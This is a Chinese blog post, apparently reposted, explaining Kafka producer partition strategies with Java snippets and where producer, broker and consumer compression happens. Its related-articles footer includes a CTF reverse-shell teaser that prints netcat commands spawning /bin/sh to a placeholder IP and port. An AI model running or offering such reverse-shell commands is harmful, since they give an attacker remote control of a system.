Kafka入门-分区及压缩

news2024/7/6 18:11:56

一、生产者消息分区

Kafka的消息组织方式实际上是三级结构:主题-分区-消息。主题下的每条消息只会保存在某一个分区中,而不会在多个分区中被保存多份。

分区的作用就是提供负载均衡的能力,或者说对数据进行分区的主要原因,就是为了实现系统的高伸缩性(Scalability)。不同的分区能够被放置到不同节点的机器上,而数据的读写操作也都是针对分区这个粒度而进行的,这样每个节点的机器都能独立地执行各自分区的读写请求处理。并且,我们还可以通过添加新的节点机器来增加整体系统的吞吐量。 

分区策略

所谓分区策略是决定生产者将消息发送到哪个分区的算法。Kafka为我们提供了默认的分区策略,同时它也支持自定义分区策略。 如果要自定义分区策略,需要显式地配置生产者端的参数partitioner.class。这个参数该怎么设定呢?方法很简单,在编写生产者程序时,你可以编写一个具体的类实现org.apache.kafka.clients.producer.Partitioner接口。这个接口也很简单,只定义了两个方法:partition()和close(),通常你只需要实现最重要的partition方法。我们来看看这个方法的方法签名:

int partition(String topic, Object key, byte[] keyBytes, Object value, byte[] valueBytes, Cluster cluster);

这里的topic、key、keyBytes、value和valueBytes都属于消息数据,cluster则是集群信息(比如当前Kafka集群共有多少主题、多少Broker等)。只要实现类定义好了partition方法,同时设置partitioner.class参数为实现类的FullQualified Name,那么生产者程序就会按照代码逻辑对消息进行分区。

比较常见的分区策略:

1. 轮询策略

未指定partitioner.class参数,默认使用

2. 随机策略

要实现随机策略版的partition方法,很简单,只需要两行代码即可:

List<PartitionInfo> partitions = cluster.partitionsForTopic(topic);
return ThreadLocalRandom.current().nextInt(partitions.size());

 先计算出该主题总的分区数,然后随机地返回一个小于它的正整数。

3. 按消息键保序策略 

Kafka允许为每条消息定义消息键,简称为Key。这个Key的作用非常大,它可以是一个有着明确业务含义的字符串,比如客户代码、部门编号或是业务ID等;一旦消息被定义了Key,那么就可以保证同一个Key的所有消息都进入到相同的分区里面,实现这个策略的partition方法同样简单,只需要下面两行代码即可:

List<PartitionInfo> partitions = cluster.partitionsForTopic(topic);
return Math.abs(key.hashCode()) % partitions.size();

4. 基于地理位置的分区策略

这种策略一般只针对那些大规模的Kafka集群,特别是跨城市、跨国家甚至是跨大洲的集群。

根据Broker所在的IP地址实现定制化的分区策略。比如下面这段代码:

List<PartitionInfo> partitions = cluster.partitionsForTopic(topic);
return partitions.stream().filter(p -> isSouth(p.leader().host())).map(PartitionInfo::partition).findAny().get();

 二、Kafka的压缩

Kafka的消息层次都分为两层:消息集合(messageset)以及消息(message)。一个消息集合中包含若干条日志项(record item),而日志项才是真正封装消息的地方。Kafka底层的消息日志由一系列消息集合日志项组成。Kafka通常不会直接操作具体的一条条消息,它总是在消息集合这个层面上进行写入操作。

在Kafka中,压缩可能发生在两个地方:生产者端和Broker端

生产者端

生产者程序中配置compression.type参数即表示启用指定类型的压缩算法。比如下面这段程序代码展示了如何构建一个开启GZIP的Producer对象:

Properties props = new Properties();
props.put("bootstrap.servers", "localhost:9092");
props.put("acks", "all");
props.put("key.serializer", "org.apache.kafka.common.serialization.StringSerializer");
props.put("value.serializer", "org.apache.kafka.common.serialization.StringSerializer");
// 开启GZIP压缩
props.put("compression.type", "gzip");
Producer<String, String> producer = new KafkaProducer<>(props);

这样Producer启动后生产的每个消息集合都是经GZIP压缩过的,故而能很好地节省网络传输带宽以 及Kafka Broker端的磁盘占用。 

Broker端

1. Broker端指定了和Producer端不同的压缩算法。Broker端也有一个参数叫compression.type,默认值是producer,可以设置不同压缩算法。

2. Broker端发生了消息格式转换。为了兼容老版本的格式,Broker端 会对新版本消息执行向老版本格式的转换。这个过程中会涉及消息的解压缩和重新压缩。

解压缩

解压缩发生在消费者程序中,也就是说Producer发送压缩消息到Broker后,Broker照单全收并原样保存起来。当Consumer程序请求这部分消息时,由Consumer自行解压缩还原成之前的消息。

Consumer怎么知道这些消息是用何种压缩算法压缩的呢?其实答案就在消息中。Kafka会将启用了哪种压缩算法封装进消息集合中,这样当Consumer读取到消息集合时,它自然就知道 这些消息使用的是哪种压缩算法。

Producer端压缩、Broker端保持、Consumer端解压缩

对于Kafka而言压缩算法对比:

        在吞吐量方面:LZ4 > Snappy > zstd和GZIP;

        而在压缩比方面,zstd > LZ4 > GZIP > Snappy。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1866916.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

【已解决】Pycharm:卡顿解决方案汇总

可能原因&#xff1a; 1、内存少 2、加载慢 3、文件多 4、硬件老 解决方案&#xff1a; 本机测试在 MAC&#xff0c;Windows、Linux也有相应的设置&#xff0c;请自行查询。 一、调整Pycharm使用内存 Help - Change Memory Settings 二、取消勾选 重复打开上次项目 Pych…

渗透测试之网络基础

文章目录 1. TCP/IP体系结构2. 什么是IP地址2.1 内网IP2.2 公网IP2.3 公网IP与内网IP的关系2.4 判断IP地址是公网或内网 3. 什么是TCP逻辑端口3.1 端口的定义3.2 查看开启的端口 4. HTTP超文本传输协议4.1 什么是HTTP4.2 HTTP协议特点4.3 请求消息——request4.4 HTTP的请求方式…

【研究】大模型应用场景分类与硬件升级

大模型应用#1&#xff1a;从Chatbot到AI Agent&#xff0c;个人助理重塑手机应用生态 AI大模型的能力进步推动Chatbot在C端广泛“出圈”。Chatbot&#xff08;聊天机器人&#xff09;通过自动化方式来处理和回复用户输入&#xff0c;可以模拟人类对话&#xff0c;通过文字或语…

软考系统架构师考试考点整理就看这一篇

软考系统架构师考试考点整理就看这一篇 最近软考成绩出来了不少同学与笔者沟通&#xff0c;聊到软考现在越来越难了&#xff0c;考了两三次都没过&#xff0c;也有不少新同学咨询软考考试的一些福利政策&#xff0c;投入大量的物力&#xff0c;财力&#xff0c;精力&#xff0c…

MySQL笔记——索引

索引 SQL性能分析使用原则SQL提示覆盖索引前缀索引单列索引和联合索引索引设计原则 学习黑马MySQL课程&#xff0c;记录笔记&#xff0c;用于复习。 查询建表语句&#xff1a; show create table account;以下为建表语句&#xff1a; CREATE TABLE account (id int NOT NULL …

反弹shell 纯干货版 --D--K--盾

本文主要讲解我已知的CTF中对VPS的利用的教程模块&#xff0c;所以本篇文章将会持续更新并且有改动 解密base64会解锁新大陆&#xff1a; REvnm77lrpjmlrnnvqTvvJo3MjcwNzcwNTU弹shell 弹shell有很多种类 NC nc ip port -e /bin/sh nc -e /bin/sh ip port //这种版…

从中序与后序遍历序列构造二叉树-二叉树题型

106. 从中序与后序遍历序列构造二叉树 - 力扣&#xff08;LeetCode&#xff09; right要再left前面 如下如&#xff0c;后序为第一行&#xff0c;最后一个是根&#xff1b; 中序为第二行&#xff0c;中间的为根&#xff1b; 通过后序的最后一个元素从中序中找到根&#xff0…

NodeJs 使用中间件实现日志生成功能

写在前面 今天我们实现一个记录 nodejs 服务请求日志的功能&#xff0c;大概的功能包括请求拦截&#xff0c;将请求的信息作为日志文件的内容写入到 txt 文件中&#xff0c;然后输出到指定的日志到当天日期目录中&#xff0c;从而实现后续查找用户请求信息的功能&#xff0c;下…

三级医院智慧医院信息化规划方案(65页PPT)

方案介绍&#xff1a; 该方案通过信息化手段实现医院信息化全覆盖&#xff0c;优化诊疗流程、提高诊疗效率和准确性&#xff1b;同时实现医疗资源的合理配置和共享&#xff0c;提升医疗服务质量。通过优化患者就医流程、提供便捷的服务和宣传健康知识等方式提高患者满意度。通…

SpringBoot优点达项目实战:获取系统配置接口(三)

SpringBoot优点达项目实战&#xff1a;获取系统配置接口&#xff08;二&#xff09; 文章目录 SpringBoot优点达项目实战&#xff1a;获取系统配置接口&#xff08;二&#xff09;1、查看接口2、查看数据库3、代码实现1、创建实体类SysConfig2、创建返回数据的vo3、创建control…

【Unity】RPG2D龙城纷争(六)关卡编辑器之角色编辑

更新日期&#xff1a;2024年6月26日。 项目源码&#xff1a;第五章发布&#xff08;正式开始游戏逻辑的章节&#xff09; 索引 简介一、角色编辑模式1.将字段限制为只读2.创建角色&#xff08;刷角色&#xff09;3.预览所有角色4.编辑选中角色属性5.移动角色位置6.移除角色 简介…

postgres数据库的流复制

1. 流复制和逻辑复制的差异 逻辑复制和流复制最直观的不同是&#xff0c;逻辑复制支持表级别复制区分点事原理不同 逻辑日志是在wal日志产生的数据库上&#xff0c;由逻辑解析模块对wal日志进行初步的解析&#xff0c;解析结果是ReorderBufferChange&#xff08;理解为HeapTup…

EOS Black延迟高如何处理 EOS Black延迟高这样降低

EOS Black中&#xff0c;玩家可以根据自己的喜好和策略&#xff0c;随心所欲地雕琢人物属性&#xff0c;选择装备属性&#xff0c;搭配千变万化的技能&#xff0c;甚至还可以自定义职业&#xff0c;打造出最适合自己的角色。这种自由度极高的玩法&#xff0c;让玩家能够真正体验…

3D Web轻量引擎HOOPS Web Platform赋能AEC行业数字化,高效渲染与多格式支持!

在建筑、工程和施工&#xff08;AEC&#xff09;行业&#xff0c;数字化转型和高效协作正变得越来越重要。为应对日益复杂的项目需求和不断提升的质量标准&#xff0c;AEC企业需要一种强大的工具来实现高效的3D可视化和数据管理。HOOPS Web Platform作为一款综合性3D开发平台&a…

数字图像分析(第二部分)

文章目录 第8章 图像分割图像分割定义阈值分割依赖像素的阈值选取Otsus方法依赖区域的阈值选取依赖坐标的阈值选取变化阈值法区域生长法分裂合并方法分水岭算法聚类分割算法K-meansAP算法Graph cut第9章 图像特征表达基于全局特征的图像表达直方图GIST基于局部特征的图像表达简…

【护眼科普】台灯怎么选对眼睛好?五大适合学生写作业的台灯推荐

作为一位家长&#xff0c;我深切地领悟到保护孩子眼部健康的至关重要性。随着科技的日新月异&#xff0c;孩子们愈发频繁地接触和使用各类电子设备&#xff0c;如平板电脑、手机和电视&#xff0c;屏幕时间几乎占据了他们日常生活的相当一部分。然而&#xff0c;不容忽视的是&a…

openlayers性能优化——开启图层预加载、减少空白等待时间

使用切片图层时、地图拖拽会有空白图片&#xff0c;为了减少空白等待时间&#xff0c;我们可以开始图层预加载。 const map_top new Map({layers: [new TileLayer({preload:Infinity, //预加载source: new StadiaMaps({layer: "outdoors",}),}),],target: "ma…

【5】apollo编写python节点步骤及实例

在workspace/modules下新建包buildtool create --template component modules/test_one 编译包 buildtool build -p modules/test_two/ 增加自己的proto消息 在刚才自动生成的proto文件里面添加自己定义的消息,记得重新编译. syntax "proto2";package apollo;…

网络编程基础知识拾遗:用大白话解释什么是交换机、路由器、光猫、IP地址和子网掩码、公网和内网IP、端口和域名

二层交换机 在没有二层交换机的环境中&#xff0c;两台电脑或多个电脑之间的通信主要依赖于直连方式或共享介质。假如你和你的舍友都有一台电脑&#xff0c;当你们之间想要进行通信的时候&#xff0c;在没有二层交换机的情况下&#xff0c;可以使用网线&#xff08;为了方便理…

SpringBoot中使用多线程调用异步方法,异步方法有无返回值例子。

快速了解Async注解的用法&#xff0c;包括异步方法无返回值、有返回值&#xff0c;最后总结Async注解失效的几个坑。 在我们的 SpringBoot 应用中&#xff0c;经常会遇到在一个接口中&#xff0c;同时做事情1&#xff0c;事情2&#xff0c;事情3&#xff0c;如果同步执行的话&a…